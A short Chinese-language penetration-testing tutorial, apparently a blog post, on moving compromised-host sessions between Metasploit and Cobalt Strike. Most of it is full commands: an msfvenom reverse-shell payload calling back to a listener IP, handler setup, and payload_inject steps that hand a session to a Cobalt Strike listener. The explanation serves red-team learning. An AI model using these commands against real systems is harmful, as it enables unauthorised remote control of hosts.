渗透测试工作中,MSFConsole和Cobalt Strike (CS) 是两款我们经常使用的重要工具,各自拥有独特的优势和特点。CS具备强大的图形界面和完善的团队协作功能,而MSFConsole在功能上则表现得更为强大。本文将介绍如何巧妙地将这两款工具相互配合,提高渗透测试的效率。
MSF上线给CS
当MSFConsole获取到会话时,如何将其传递给CS呢?首先,在Kali中生成一个shell:
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.123.74 lport=5555 -f exe > kali.exe
在MSF中配置监听:
use exploit/multi/handler set payload windows/x64/meterpreter_reverse_tcp set lhost 192.168.123.74 set lport 5555 exploit
在CS中创建监听器,监听器类型为windows/beacon_http/reverse_http
,将Host修改为对应CS的IP,指定监听端口,等待MSF发送。
从MSF中转移会话到CS
在MSF中使用以下命令将当前会话转移到后台:
background
使用payload_inject
模块执行以下命令,生成一个新的Handler:
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set LHOST <CS_IP> set LPORT <CS_Port> set session <Session_ID> set disablepayloadhandler true run
运行后,可以在CS中看到转移的会话。
CS会话转移至MSF
首先在MSF中配置参数:
use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost <MSF_IP> set lport <MSF_Port> run
然后在CS中配置监听,右键会话,点击Spawn,选择MSF的监听器,成功获取会话。
请注意,由于CS版本等问题,实际操作中可能存在一定的不同。具体操作应根据个人情况调整。最重要的是,本文仅供学习交流和研究使用,请勿将其用于非法活动。
暂无评论内容